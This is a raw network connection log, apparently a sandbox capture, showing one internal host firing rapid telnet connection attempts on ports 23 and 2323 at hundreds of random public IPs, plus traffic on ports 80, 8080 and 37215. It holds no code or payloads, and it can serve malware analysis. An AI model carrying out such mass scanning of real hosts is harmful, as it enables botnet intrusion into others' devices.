Feb 14, 2024 09:28:47.430386066 CET	1184	23	192.168.2.15	104.147.62.23
Feb 14, 2024 09:28:47.430386066 CET	1184	23	192.168.2.15	195.150.125.213
Feb 14, 2024 09:28:47.430398941 CET	1184	23	192.168.2.15	219.139.47.132
Feb 14, 2024 09:28:47.430406094 CET	1184	23	192.168.2.15	81.149.23.47
Feb 14, 2024 09:28:47.430414915 CET	1184	23	192.168.2.15	14.94.13.247
Feb 14, 2024 09:28:47.430422068 CET	1184	23	192.168.2.15	140.239.1.25
Feb 14, 2024 09:28:47.430425882 CET	1184	23	192.168.2.15	106.218.98.78
Feb 14, 2024 09:28:47.430428982 CET	1184	2323	192.168.2.15	159.155.34.168
Feb 14, 2024 09:28:47.430438995 CET	1184	23	192.168.2.15	149.135.53.213
Feb 14, 2024 09:28:47.430440903 CET	1184	23	192.168.2.15	94.207.223.156
Feb 14, 2024 09:28:47.430452108 CET	1184	23	192.168.2.15	175.17.179.52
Feb 14, 2024 09:28:47.430454016 CET	1184	23	192.168.2.15	190.254.80.37
Feb 14, 2024 09:28:47.430461884 CET	1184	23	192.168.2.15	111.146.173.102
Feb 14, 2024 09:28:47.430464983 CET	1184	23	192.168.2.15	146.42.170.33
Feb 14, 2024 09:28:47.430475950 CET	1184	23	192.168.2.15	159.206.64.205
Feb 14, 2024 09:28:47.430475950 CET	1184	23	192.168.2.15	221.191.30.40
Feb 14, 2024 09:28:47.430483103 CET	1184	2323	192.168.2.15	170.111.14.42
Feb 14, 2024 09:28:47.430485010 CET	1184	23	192.168.2.15	158.3.16.134
Feb 14, 2024 09:28:47.430497885 CET	1184	23	192.168.2.15	14.84.200.131
Feb 14, 2024 09:28:47.430500984 CET	1184	23	192.168.2.15	104.12.172.126
Feb 14, 2024 09:28:47.430505037 CET	1184	23	192.168.2.15	124.162.194.79
Feb 14, 2024 09:28:47.430515051 CET	1184	23	192.168.2.15	183.234.223.16
Feb 14, 2024 09:28:47.430516958 CET	1184	23	192.168.2.15	95.159.82.211
Feb 14, 2024 09:28:47.430532932 CET	1184	23	192.168.2.15	66.180.195.205
Feb 14, 2024 09:28:47.430532932 CET	1184	23	192.168.2.15	112.76.180.55
Feb 14, 2024 09:28:47.430548906 CET	1184	23	192.168.2.15	120.246.108.47
Feb 14, 2024 09:28:47.430557966 CET	1184	2323	192.168.2.15	69.253.65.177
Feb 14, 2024 09:28:47.430557966 CET	1184	23	192.168.2.15	103.171.176.172
Feb 14, 2024 09:28:47.430562019 CET	1184	23	192.168.2.15	160.65.17.242
Feb 14, 2024 09:28:47.430577040 CET	1184	23	192.168.2.15	14.198.223.5
Feb 14, 2024 09:28:47.430583000 CET	1184	23	192.168.2.15	82.145.103.16
Feb 14, 2024 09:28:47.430583954 CET	1184	23	192.168.2.15	192.101.116.42
Feb 14, 2024 09:28:47.430588007 CET	1184	23	192.168.2.15	182.208.205.112
Feb 14, 2024 09:28:47.430602074 CET	1184	23	192.168.2.15	197.174.64.10
Feb 14, 2024 09:28:47.430607080 CET	1184	23	192.168.2.15	58.112.222.26
Feb 14, 2024 09:28:47.430607080 CET	1184	23	192.168.2.15	209.33.156.41
Feb 14, 2024 09:28:47.430617094 CET	1184	2323	192.168.2.15	139.49.137.69
Feb 14, 2024 09:28:47.430619955 CET	1184	23	192.168.2.15	118.93.196.116
Feb 14, 2024 09:28:47.430632114 CET	1184	23	192.168.2.15	71.138.173.48
Feb 14, 2024 09:28:47.430632114 CET	1184	23	192.168.2.15	106.223.253.233
Feb 14, 2024 09:28:47.430645943 CET	1184	23	192.168.2.15	95.159.48.125
Feb 14, 2024 09:28:47.430650949 CET	1184	23	192.168.2.15	17.77.3.240
Feb 14, 2024 09:28:47.430650949 CET	1184	23	192.168.2.15	189.140.207.1
Feb 14, 2024 09:28:47.430659056 CET	1184	23	192.168.2.15	51.225.215.142
Feb 14, 2024 09:28:47.430670023 CET	1184	23	192.168.2.15	167.124.190.125
Feb 14, 2024 09:28:47.430680037 CET	1184	23	192.168.2.15	151.12.190.21
Feb 14, 2024 09:28:47.430684090 CET	1184	23	192.168.2.15	114.147.101.51
Feb 14, 2024 09:28:47.430685043 CET	1184	23	192.168.2.15	73.40.47.190
Feb 14, 2024 09:28:47.430685043 CET	1184	2323	192.168.2.15	116.97.168.89
Feb 14, 2024 09:28:47.430696964 CET	1184	23	192.168.2.15	1.195.227.164
Feb 14, 2024 09:28:47.430699110 CET	1184	23	192.168.2.15	78.72.183.117
Feb 14, 2024 09:28:47.430701971 CET	1184	23	192.168.2.15	122.245.166.107
Feb 14, 2024 09:28:47.430716038 CET	1184	23	192.168.2.15	18.55.115.200
Feb 14, 2024 09:28:47.430716991 CET	1184	23	192.168.2.15	128.166.214.123
Feb 14, 2024 09:28:47.430716991 CET	1184	23	192.168.2.15	128.75.143.209
Feb 14, 2024 09:28:47.430726051 CET	1184	23	192.168.2.15	32.62.221.4
Feb 14, 2024 09:28:47.430732965 CET	1184	2323	192.168.2.15	221.251.99.168
Feb 14, 2024 09:28:47.430736065 CET	1184	23	192.168.2.15	179.210.75.42
Feb 14, 2024 09:28:47.430747032 CET	1184	23	192.168.2.15	216.172.153.69
Feb 14, 2024 09:28:47.430757046 CET	1184	23	192.168.2.15	126.90.234.160
Feb 14, 2024 09:28:47.430761099 CET	1184	23	192.168.2.15	2.205.180.144
Feb 14, 2024 09:28:47.430763006 CET	1184	23	192.168.2.15	79.114.212.32
Feb 14, 2024 09:28:47.430763006 CET	1184	23	192.168.2.15	183.181.129.96
Feb 14, 2024 09:28:47.430763006 CET	1184	23	192.168.2.15	110.191.197.123
Feb 14, 2024 09:28:47.430780888 CET	1184	23	192.168.2.15	149.151.17.29
Feb 14, 2024 09:28:47.430783987 CET	1184	2323	192.168.2.15	85.184.165.72
Feb 14, 2024 09:28:47.430789948 CET	1184	23	192.168.2.15	2.43.173.157
Feb 14, 2024 09:28:47.430789948 CET	1184	23	192.168.2.15	88.172.231.180
Feb 14, 2024 09:28:47.430789948 CET	1184	23	192.168.2.15	129.212.27.58
Feb 14, 2024 09:28:47.430792093 CET	1184	23	192.168.2.15	69.16.215.90
Feb 14, 2024 09:28:47.430795908 CET	1184	23	192.168.2.15	162.235.90.231
Feb 14, 2024 09:28:47.430811882 CET	1184	23	192.168.2.15	52.225.245.195
Feb 14, 2024 09:28:47.430814028 CET	1184	23	192.168.2.15	139.56.174.76
Feb 14, 2024 09:28:47.430814028 CET	1184	23	192.168.2.15	43.17.144.47
Feb 14, 2024 09:28:47.430824041 CET	1184	23	192.168.2.15	12.13.182.160
Feb 14, 2024 09:28:47.430840015 CET	1184	23	192.168.2.15	200.32.103.73
Feb 14, 2024 09:28:47.430841923 CET	1184	23	192.168.2.15	112.250.98.128
Feb 14, 2024 09:28:47.430844069 CET	1184	2323	192.168.2.15	132.14.127.204
Feb 14, 2024 09:28:47.430846930 CET	1184	23	192.168.2.15	59.196.18.23
Feb 14, 2024 09:28:47.430857897 CET	1184	23	192.168.2.15	95.81.62.219
Feb 14, 2024 09:28:47.430861950 CET	1184	23	192.168.2.15	158.41.245.0
Feb 14, 2024 09:28:47.430871010 CET	1184	23	192.168.2.15	156.128.102.161
Feb 14, 2024 09:28:47.430874109 CET	1184	23	192.168.2.15	139.48.240.229
Feb 14, 2024 09:28:47.430891037 CET	1184	23	192.168.2.15	119.192.153.15
Feb 14, 2024 09:28:47.430891991 CET	1184	23	192.168.2.15	172.79.55.62
Feb 14, 2024 09:28:47.430895090 CET	1184	23	192.168.2.15	43.179.84.182
Feb 14, 2024 09:28:47.430905104 CET	1184	2323	192.168.2.15	179.61.29.82
Feb 14, 2024 09:28:47.430915117 CET	1184	23	192.168.2.15	126.156.63.76
Feb 14, 2024 09:28:47.430916071 CET	1184	23	192.168.2.15	1.22.252.187
Feb 14, 2024 09:28:47.430927038 CET	1184	23	192.168.2.15	183.102.169.89
Feb 14, 2024 09:28:47.430931091 CET	1184	23	192.168.2.15	160.199.171.184
Feb 14, 2024 09:28:47.430938959 CET	1184	23	192.168.2.15	156.39.123.109
Feb 14, 2024 09:28:47.430948973 CET	1184	23	192.168.2.15	4.77.254.140
Feb 14, 2024 09:28:47.430952072 CET	1184	23	192.168.2.15	212.219.97.246
Feb 14, 2024 09:28:47.430965900 CET	1184	23	192.168.2.15	144.152.79.88
Feb 14, 2024 09:28:47.430968046 CET	1184	23	192.168.2.15	25.38.125.174
Feb 14, 2024 09:28:47.430973053 CET	1184	2323	192.168.2.15	151.239.254.222
Feb 14, 2024 09:28:47.430979013 CET	1184	23	192.168.2.15	204.145.250.24
Feb 14, 2024 09:28:47.430979013 CET	1184	23	192.168.2.15	155.226.100.10
Feb 14, 2024 09:28:47.430984020 CET	1184	23	192.168.2.15	128.123.51.82
Feb 14, 2024 09:28:47.430990934 CET	1184	23	192.168.2.15	97.79.98.37
Feb 14, 2024 09:28:47.430991888 CET	1184	23	192.168.2.15	159.203.162.234
Feb 14, 2024 09:28:47.430996895 CET	1184	23	192.168.2.15	95.174.101.45
Feb 14, 2024 09:28:47.430996895 CET	1184	23	192.168.2.15	77.161.58.23
Feb 14, 2024 09:28:47.431008101 CET	1184	23	192.168.2.15	63.102.228.2
Feb 14, 2024 09:28:47.431011915 CET	1184	23	192.168.2.15	200.109.207.232
Feb 14, 2024 09:28:47.431015968 CET	1184	2323	192.168.2.15	123.82.151.166
Feb 14, 2024 09:28:47.431015968 CET	1184	23	192.168.2.15	87.77.93.251
Feb 14, 2024 09:28:47.431016922 CET	1184	23	192.168.2.15	59.33.237.156
Feb 14, 2024 09:28:47.431021929 CET	1184	23	192.168.2.15	46.182.95.18
Feb 14, 2024 09:28:47.431034088 CET	1184	23	192.168.2.15	168.106.196.98
Feb 14, 2024 09:28:47.431034088 CET	1184	23	192.168.2.15	131.186.104.202
Feb 14, 2024 09:28:47.431034088 CET	1184	23	192.168.2.15	212.81.67.229
Feb 14, 2024 09:28:47.431049109 CET	1184	23	192.168.2.15	193.249.146.80
Feb 14, 2024 09:28:47.431056976 CET	1184	23	192.168.2.15	217.11.146.172
Feb 14, 2024 09:28:47.431058884 CET	1184	23	192.168.2.15	190.39.150.153
Feb 14, 2024 09:28:47.431058884 CET	1184	23	192.168.2.15	167.194.178.4
Feb 14, 2024 09:28:47.431058884 CET	1184	2323	192.168.2.15	23.194.103.45
Feb 14, 2024 09:28:47.431066990 CET	1184	23	192.168.2.15	160.119.228.55
Feb 14, 2024 09:28:47.431070089 CET	1184	23	192.168.2.15	31.154.141.184
Feb 14, 2024 09:28:47.431083918 CET	1184	23	192.168.2.15	25.219.197.34
Feb 14, 2024 09:28:47.431083918 CET	1184	23	192.168.2.15	97.113.166.116
Feb 14, 2024 09:28:47.431094885 CET	1184	23	192.168.2.15	156.82.127.83
Feb 14, 2024 09:28:47.431107998 CET	1184	23	192.168.2.15	17.109.120.74
Feb 14, 2024 09:28:47.431107998 CET	1184	23	192.168.2.15	36.20.124.57
Feb 14, 2024 09:28:47.431119919 CET	1184	23	192.168.2.15	73.32.143.110
Feb 14, 2024 09:28:47.431128979 CET	1184	2323	192.168.2.15	88.88.128.163
Feb 14, 2024 09:28:47.431138039 CET	1184	23	192.168.2.15	84.151.65.174
Feb 14, 2024 09:28:47.431143045 CET	1184	23	192.168.2.15	126.94.195.110
Feb 14, 2024 09:28:47.431144953 CET	1184	23	192.168.2.15	176.123.228.230
Feb 14, 2024 09:28:47.431147099 CET	1184	23	192.168.2.15	138.28.70.209
Feb 14, 2024 09:28:47.431154966 CET	1184	23	192.168.2.15	181.159.70.127
Feb 14, 2024 09:28:47.431162119 CET	1184	23	192.168.2.15	144.124.147.59
Feb 14, 2024 09:28:47.431174994 CET	1184	23	192.168.2.15	154.226.213.48
Feb 14, 2024 09:28:47.431180000 CET	1184	23	192.168.2.15	180.72.199.39
Feb 14, 2024 09:28:47.431181908 CET	1184	23	192.168.2.15	95.118.38.87
Feb 14, 2024 09:28:47.431180000 CET	1184	2323	192.168.2.15	71.76.45.182
Feb 14, 2024 09:28:47.431189060 CET	1184	23	192.168.2.15	203.219.183.31
Feb 14, 2024 09:28:47.431196928 CET	1184	23	192.168.2.15	116.15.42.249
Feb 14, 2024 09:28:47.431206942 CET	1184	23	192.168.2.15	130.189.143.235
Feb 14, 2024 09:28:47.431207895 CET	1184	23	192.168.2.15	148.54.218.19
Feb 14, 2024 09:28:47.431221008 CET	1184	23	192.168.2.15	102.3.46.202
Feb 14, 2024 09:28:47.431226015 CET	1184	23	192.168.2.15	223.52.148.134
Feb 14, 2024 09:28:47.431226015 CET	1184	23	192.168.2.15	149.185.153.149
Feb 14, 2024 09:28:47.431240082 CET	1184	23	192.168.2.15	63.82.122.84
Feb 14, 2024 09:28:47.431241989 CET	1184	23	192.168.2.15	1.190.206.40
Feb 14, 2024 09:28:47.431245089 CET	1184	2323	192.168.2.15	66.61.86.126
Feb 14, 2024 09:28:47.431245089 CET	1184	23	192.168.2.15	149.195.61.76
Feb 14, 2024 09:28:47.431258917 CET	1184	23	192.168.2.15	169.144.72.160
Feb 14, 2024 09:28:47.431262016 CET	1184	23	192.168.2.15	35.147.211.86
Feb 14, 2024 09:28:47.431271076 CET	1184	23	192.168.2.15	172.105.117.29
Feb 14, 2024 09:28:47.431273937 CET	1184	23	192.168.2.15	8.196.85.192
Feb 14, 2024 09:28:47.431283951 CET	1184	23	192.168.2.15	54.171.35.16
Feb 14, 2024 09:28:47.431287050 CET	1184	23	192.168.2.15	73.113.10.27
Feb 14, 2024 09:28:47.431286097 CET	1184	23	192.168.2.15	222.104.104.220
Feb 14, 2024 09:28:47.431293964 CET	1184	23	192.168.2.15	184.166.158.170
Feb 14, 2024 09:28:47.431304932 CET	1184	2323	192.168.2.15	157.117.112.26
Feb 14, 2024 09:28:47.431308985 CET	1184	23	192.168.2.15	17.158.239.213
Feb 14, 2024 09:28:47.431338072 CET	1184	23	192.168.2.15	18.243.73.99
Feb 14, 2024 09:28:47.431343079 CET	1184	23	192.168.2.15	190.207.234.63
Feb 14, 2024 09:28:47.431343079 CET	1184	23	192.168.2.15	86.61.238.140
Feb 14, 2024 09:28:47.431358099 CET	1184	23	192.168.2.15	203.157.158.43
Feb 14, 2024 09:28:47.431364059 CET	1184	23	192.168.2.15	175.218.109.174
Feb 14, 2024 09:28:47.431365013 CET	1184	23	192.168.2.15	213.75.105.169
Feb 14, 2024 09:28:47.431365013 CET	1184	23	192.168.2.15	51.124.190.164
Feb 14, 2024 09:28:47.431375027 CET	1184	2323	192.168.2.15	177.124.226.26
Feb 14, 2024 09:28:47.431380987 CET	1184	23	192.168.2.15	23.21.208.57
Feb 14, 2024 09:28:47.431384087 CET	1184	23	192.168.2.15	145.255.168.91
Feb 14, 2024 09:28:47.431386948 CET	1184	23	192.168.2.15	202.209.235.199
Feb 14, 2024 09:28:47.431386948 CET	1184	23	192.168.2.15	161.43.110.249
Feb 14, 2024 09:28:47.431401014 CET	1184	23	192.168.2.15	27.87.107.2
Feb 14, 2024 09:28:47.431410074 CET	1184	23	192.168.2.15	12.174.191.33
Feb 14, 2024 09:28:47.431411982 CET	1184	23	192.168.2.15	194.175.19.115
Feb 14, 2024 09:28:47.431411982 CET	1184	23	192.168.2.15	74.125.87.211
Feb 14, 2024 09:28:47.431411982 CET	1184	23	192.168.2.15	220.208.132.95
Feb 14, 2024 09:28:47.431411982 CET	1184	23	192.168.2.15	115.97.7.113
Feb 14, 2024 09:28:47.431416035 CET	1184	2323	192.168.2.15	34.222.161.151
Feb 14, 2024 09:28:47.431427956 CET	1184	23	192.168.2.15	121.61.87.76
Feb 14, 2024 09:28:47.431433916 CET	1184	23	192.168.2.15	149.215.22.162
Feb 14, 2024 09:28:47.431433916 CET	1184	23	192.168.2.15	151.9.175.234
Feb 14, 2024 09:28:47.431433916 CET	1184	23	192.168.2.15	51.138.7.254
Feb 14, 2024 09:28:47.431448936 CET	1184	23	192.168.2.15	92.253.245.184
Feb 14, 2024 09:28:47.431448936 CET	1184	23	192.168.2.15	125.156.68.7
Feb 14, 2024 09:28:47.431454897 CET	1184	23	192.168.2.15	154.152.21.90
Feb 14, 2024 09:28:47.431462049 CET	1184	23	192.168.2.15	119.5.218.63
Feb 14, 2024 09:28:47.431464911 CET	1184	23	192.168.2.15	32.122.186.58
Feb 14, 2024 09:28:47.431467056 CET	1184	2323	192.168.2.15	59.19.78.77
Feb 14, 2024 09:28:47.431482077 CET	1184	23	192.168.2.15	40.50.255.47
Feb 14, 2024 09:28:47.431483984 CET	1184	23	192.168.2.15	90.216.196.66
Feb 14, 2024 09:28:47.431487083 CET	1184	23	192.168.2.15	120.62.32.91
Feb 14, 2024 09:28:47.431490898 CET	1184	23	192.168.2.15	62.238.158.85
Feb 14, 2024 09:28:47.431503057 CET	1184	23	192.168.2.15	206.6.48.73
Feb 14, 2024 09:28:47.431505919 CET	1184	23	192.168.2.15	14.136.187.133
Feb 14, 2024 09:28:47.431515932 CET	1184	23	192.168.2.15	180.90.8.154
Feb 14, 2024 09:28:47.431519985 CET	1184	23	192.168.2.15	17.192.141.229
Feb 14, 2024 09:28:47.431520939 CET	1184	23	192.168.2.15	124.68.119.172
Feb 14, 2024 09:28:47.431535959 CET	1184	2323	192.168.2.15	5.145.132.93
Feb 14, 2024 09:28:47.431550026 CET	1184	23	192.168.2.15	188.90.254.167
Feb 14, 2024 09:28:47.431551933 CET	1184	23	192.168.2.15	36.47.185.26
Feb 14, 2024 09:28:47.431561947 CET	1184	23	192.168.2.15	212.206.205.27
Feb 14, 2024 09:28:47.443346977 CET	80	43802	112.135.211.255	192.168.2.15
Feb 14, 2024 09:28:47.443456888 CET	43802	80	192.168.2.15	112.135.211.255
Feb 14, 2024 09:28:47.443471909 CET	43802	80	192.168.2.15	112.135.211.255
Feb 14, 2024 09:28:47.455524921 CET	80	43794	112.135.211.255	192.168.2.15
Feb 14, 2024 09:28:47.457957029 CET	80	43794	112.135.211.255	192.168.2.15
Feb 14, 2024 09:28:47.541408062 CET	37215	8096	197.4.200.146	192.168.2.15
Feb 14, 2024 09:28:47.551002026 CET	8080	6752	62.106.69.47	192.168.2.15
Feb 14, 2024 09:28:47.569938898 CET	80	60120	95.101.201.148	192.168.2.15
Feb 14, 2024 09:28:47.570028067 CET	60120	80	192.168.2.15	95.101.201.148
Feb 14, 2024 09:28:47.570065022 CET	60120	80	192.168.2.15	95.101.201.148
Feb 14, 2024 09:28:47.570065022 CET	60120	80	192.168.2.15	95.101.201.148
Feb 14, 2024 09:28:47.570097923 CET	60142	80	192.168.2.15	95.101.201.148
Feb 14, 2024 09:28:47.585505962 CET	80	45086	95.100.127.15	192.168.2.15
Feb 14, 2024 09:28:47.585597992 CET	45086	80	192.168.2.15	95.100.127.15
Feb 14, 2024 09:28:47.585597992 CET	45086	80	192.168.2.15	95.100.127.15
Feb 14, 2024 09:28:47.585597992 CET	45086	80	192.168.2.15	95.100.127.15
Feb 14, 2024 09:28:47.585711002 CET	45108	80	192.168.2.15	95.100.127.15
Feb 14, 2024 09:28:47.589757919 CET	80	52484	95.47.167.65	192.168.2.15
Feb 14, 2024 09:28:47.589804888 CET	52484	80	192.168.2.15	95.47.167.65
Feb 14, 2024 09:28:47.589840889 CET	52506	80	192.168.2.15	95.47.167.65
Feb 14, 2024 09:28:47.589848995 CET	52484	80	192.168.2.15	95.47.167.65
Feb 14, 2024 09:28:47.589848995 CET	52484	80	192.168.2.15	95.47.167.65
Feb 14, 2024 09:28:47.591531038 CET	80	60806	95.165.139.210	192.168.2.15
Feb 14, 2024 09:28:47.591618061 CET	60806	80	192.168.2.15	95.165.139.210
Feb 14, 2024 09:28:47.591618061 CET	60806	80	192.168.2.15	95.165.139.210
Feb 14, 2024 09:28:47.591640949 CET	60806	80	192.168.2.15	95.165.139.210
Feb 14, 2024 09:28:47.591640949 CET	60828	80	192.168.2.15	95.165.139.210
Feb 14, 2024 09:28:47.595308065 CET	8080	6752	94.102.194.14	192.168.2.15
Feb 14, 2024 09:28:47.597131968 CET	8080	6752	85.159.209.166	192.168.2.15
Feb 14, 2024 09:28:47.598539114 CET	8080	6752	85.204.160.245	192.168.2.15
Feb 14, 2024 09:28:47.598923922 CET	8080	6752	62.232.111.13	192.168.2.15
Feb 14, 2024 09:28:47.602421045 CET	8080	6752	62.91.24.175	192.168.2.15
Feb 14, 2024 09:28:47.603957891 CET	8080	6752	62.28.172.40	192.168.2.15
Feb 14, 2024 09:28:47.609891891 CET	80	52620	95.215.242.21	192.168.2.15
Feb 14, 2024 09:28:47.609940052 CET	52620	80	192.168.2.15	95.215.242.21
Feb 14, 2024 09:28:47.609966040 CET	52620	80	192.168.2.15	95.215.242.21
Feb 14, 2024 09:28:47.609966040 CET	52620	80	192.168.2.15	95.215.242.21
Feb 14, 2024 09:28:47.609968901 CET	52642	80	192.168.2.15	95.215.242.21
Feb 14, 2024 09:28:47.610706091 CET	8080	6752	94.224.69.8	192.168.2.15
Feb 14, 2024 09:28:47.613277912 CET	37215	8096	197.128.114.142	192.168.2.15
Feb 14, 2024 09:28:47.613713026 CET	8080	6752	62.100.85.57	192.168.2.15
Feb 14, 2024 09:28:47.616559029 CET	80	54268	95.86.78.146	192.168.2.15
Feb 14, 2024 09:28:47.616647959 CET	54268	80	192.168.2.15	95.86.78.146
Feb 14, 2024 09:28:47.616647959 CET	54268	80	192.168.2.15	95.86.78.146
Feb 14, 2024 09:28:47.616664886 CET	54268	80	192.168.2.15	95.86.78.146
Feb 14, 2024 09:28:47.616699934 CET	54290	80	192.168.2.15	95.86.78.146
Feb 14, 2024 09:28:47.620924950 CET	8080	58896	31.136.107.17	192.168.2.15
Feb 14, 2024 09:28:47.620989084 CET	58896	8080	192.168.2.15	31.136.107.17
Feb 14, 2024 09:28:47.621190071 CET	58896	8080	192.168.2.15	31.136.107.17
Feb 14, 2024 09:28:47.621233940 CET	58896	8080	192.168.2.15	31.136.107.17
Feb 14, 2024 09:28:47.621305943 CET	58958	8080	192.168.2.15	31.136.107.17
Feb 14, 2024 09:28:47.621855974 CET	8080	49712	31.136.153.210	192.168.2.15
Feb 14, 2024 09:28:47.621867895 CET	80	57528	95.209.129.238	192.168.2.15
Feb 14, 2024 09:28:47.621911049 CET	49712	8080	192.168.2.15	31.136.153.210
Feb 14, 2024 09:28:47.621915102 CET	57528	80	192.168.2.15	95.209.129.238
Feb 14, 2024 09:28:47.621942997 CET	57552	80	192.168.2.15	95.209.129.238
Feb 14, 2024 09:28:47.621970892 CET	49712	8080	192.168.2.15	31.136.153.210
Feb 14, 2024 09:28:47.621970892 CET	49712	8080	192.168.2.15	31.136.153.210
Feb 14, 2024 09:28:47.621995926 CET	49732	8080	192.168.2.15	31.136.153.210
Feb 14, 2024 09:28:47.623749971 CET	8080	6752	94.101.49.114	192.168.2.15
Feb 14, 2024 09:28:47.623800039 CET	6752	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:47.625468016 CET	8080	6752	31.14.23.60	192.168.2.15
Feb 14, 2024 09:28:47.626966953 CET	8080	6752	62.109.8.123	192.168.2.15
Feb 14, 2024 09:28:47.628268957 CET	8080	6752	85.186.8.173	192.168.2.15
Feb 14, 2024 09:28:47.628673077 CET	2323	1184	195.167.194.82	192.168.2.15
Feb 14, 2024 09:28:47.629334927 CET	8080	38508	95.143.69.65	192.168.2.15
Feb 14, 2024 09:28:47.629409075 CET	38508	8080	192.168.2.15	95.143.69.65
Feb 14, 2024 09:28:47.629432917 CET	35576	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:47.629456997 CET	38508	8080	192.168.2.15	95.143.69.65
Feb 14, 2024 09:28:47.629456997 CET	38508	8080	192.168.2.15	95.143.69.65
Feb 14, 2024 09:28:47.629472971 CET	38576	8080	192.168.2.15	95.143.69.65
Feb 14, 2024 09:28:47.629906893 CET	37215	8096	197.5.35.240	192.168.2.15
Feb 14, 2024 09:28:47.631634951 CET	80	57528	95.209.129.238	192.168.2.15
Feb 14, 2024 09:28:47.631695986 CET	57528	80	192.168.2.15	95.209.129.238
Feb 14, 2024 09:28:47.631793022 CET	80	57528	95.209.129.238	192.168.2.15
Feb 14, 2024 09:28:47.635529041 CET	8080	6752	62.38.0.36	192.168.2.15
Feb 14, 2024 09:28:47.639672041 CET	23	1184	157.90.237.37	192.168.2.15
Feb 14, 2024 09:28:47.640362978 CET	23	1184	86.114.7.28	192.168.2.15
Feb 14, 2024 09:28:47.640552998 CET	23	1184	5.189.176.229	192.168.2.15
Feb 14, 2024 09:28:47.640873909 CET	8080	38974	31.136.242.67	192.168.2.15
Feb 14, 2024 09:28:47.640950918 CET	38974	8080	192.168.2.15	31.136.242.67
Feb 14, 2024 09:28:47.640984058 CET	38974	8080	192.168.2.15	31.136.242.67
Feb 14, 2024 09:28:47.640984058 CET	38974	8080	192.168.2.15	31.136.242.67
Feb 14, 2024 09:28:47.640990973 CET	39042	8080	192.168.2.15	31.136.242.67
Feb 14, 2024 09:28:47.644814968 CET	8080	6752	94.122.18.192	192.168.2.15
Feb 14, 2024 09:28:47.644886971 CET	6752	8080	192.168.2.15	94.122.18.192
Feb 14, 2024 09:28:47.647375107 CET	80	60068	112.175.243.56	192.168.2.15
Feb 14, 2024 09:28:47.648583889 CET	8080	55684	94.123.65.84	192.168.2.15
Feb 14, 2024 09:28:47.648643970 CET	55684	8080	192.168.2.15	94.123.65.84
Feb 14, 2024 09:28:47.648662090 CET	55684	8080	192.168.2.15	94.123.65.84
Feb 14, 2024 09:28:47.648662090 CET	58922	8080	192.168.2.15	94.122.18.192
Feb 14, 2024 09:28:47.648674965 CET	55684	8080	192.168.2.15	94.123.65.84
Feb 14, 2024 09:28:47.648684978 CET	55712	8080	192.168.2.15	94.123.65.84
Feb 14, 2024 09:28:47.653541088 CET	37215	8096	197.155.100.74	192.168.2.15
Feb 14, 2024 09:28:47.657402992 CET	23	1184	201.46.67.65	192.168.2.15
Feb 14, 2024 09:28:47.660387993 CET	80	35198	112.180.15.84	192.168.2.15
Feb 14, 2024 09:28:47.660434961 CET	35198	80	192.168.2.15	112.180.15.84
Feb 14, 2024 09:28:47.671276093 CET	8080	6752	85.185.222.1	192.168.2.15
Feb 14, 2024 09:28:47.687614918 CET	80	33820	112.223.39.29	192.168.2.15
Feb 14, 2024 09:28:47.687700033 CET	33820	80	192.168.2.15	112.223.39.29
Feb 14, 2024 09:28:47.689490080 CET	37215	8096	197.221.240.9	192.168.2.15
Feb 14, 2024 09:28:47.691939116 CET	80	36418	95.58.76.157	192.168.2.15
Feb 14, 2024 09:28:47.692017078 CET	36418	80	192.168.2.15	95.58.76.157
Feb 14, 2024 09:28:47.692128897 CET	36418	80	192.168.2.15	95.58.76.157
Feb 14, 2024 09:28:47.692172050 CET	36418	80	192.168.2.15	95.58.76.157
Feb 14, 2024 09:28:47.692225933 CET	36454	80	192.168.2.15	95.58.76.157
Feb 14, 2024 09:28:47.699534893 CET	80	34790	95.111.218.63	192.168.2.15
Feb 14, 2024 09:28:47.699609041 CET	34790	80	192.168.2.15	95.111.218.63
Feb 14, 2024 09:28:47.699644089 CET	34790	80	192.168.2.15	95.111.218.63
Feb 14, 2024 09:28:47.699644089 CET	34790	80	192.168.2.15	95.111.218.63
Feb 14, 2024 09:28:47.699656963 CET	34826	80	192.168.2.15	95.111.218.63
Feb 14, 2024 09:28:47.713382959 CET	23	1184	14.94.13.247	192.168.2.15
Feb 14, 2024 09:28:47.719532013 CET	23	1184	125.156.68.7	192.168.2.15
Feb 14, 2024 09:28:47.720330000 CET	23	1184	119.192.153.15	192.168.2.15
Feb 14, 2024 09:28:47.733944893 CET	8080	6752	31.0.251.14	192.168.2.15
Feb 14, 2024 09:28:47.759826899 CET	23	1184	119.5.218.63	192.168.2.15
Feb 14, 2024 09:28:47.761068106 CET	23	1184	172.105.117.29	192.168.2.15
Feb 14, 2024 09:28:47.766757965 CET	80	43802	112.135.211.255	192.168.2.15
Feb 14, 2024 09:28:47.776938915 CET	80	60120	95.101.201.148	192.168.2.15
Feb 14, 2024 09:28:47.777223110 CET	80	60120	95.101.201.148	192.168.2.15
Feb 14, 2024 09:28:47.777312040 CET	60120	80	192.168.2.15	95.101.201.148
Feb 14, 2024 09:28:47.777398109 CET	80	60120	95.101.201.148	192.168.2.15
Feb 14, 2024 09:28:47.777441978 CET	60120	80	192.168.2.15	95.101.201.148
Feb 14, 2024 09:28:47.779544115 CET	23	1184	1.190.206.40	192.168.2.15
Feb 14, 2024 09:28:47.785444975 CET	80	60142	95.101.201.148	192.168.2.15
Feb 14, 2024 09:28:47.785621881 CET	60142	80	192.168.2.15	95.101.201.148
Feb 14, 2024 09:28:47.785680056 CET	60142	80	192.168.2.15	95.101.201.148
Feb 14, 2024 09:28:47.808549881 CET	80	45108	95.100.127.15	192.168.2.15
Feb 14, 2024 09:28:47.808573961 CET	80	45086	95.100.127.15	192.168.2.15
Feb 14, 2024 09:28:47.808638096 CET	45108	80	192.168.2.15	95.100.127.15
Feb 14, 2024 09:28:47.808665991 CET	45108	80	192.168.2.15	95.100.127.15
Feb 14, 2024 09:28:47.808783054 CET	80	45086	95.100.127.15	192.168.2.15
Feb 14, 2024 09:28:47.808845043 CET	45086	80	192.168.2.15	95.100.127.15
Feb 14, 2024 09:28:47.808929920 CET	80	45086	95.100.127.15	192.168.2.15
Feb 14, 2024 09:28:47.808979034 CET	45086	80	192.168.2.15	95.100.127.15
Feb 14, 2024 09:28:47.811991930 CET	80	43802	112.135.211.255	192.168.2.15
Feb 14, 2024 09:28:47.812045097 CET	43802	80	192.168.2.15	112.135.211.255
Feb 14, 2024 09:28:47.821878910 CET	80	60806	95.165.139.210	192.168.2.15
Feb 14, 2024 09:28:47.821918011 CET	37215	8096	197.7.87.1	192.168.2.15
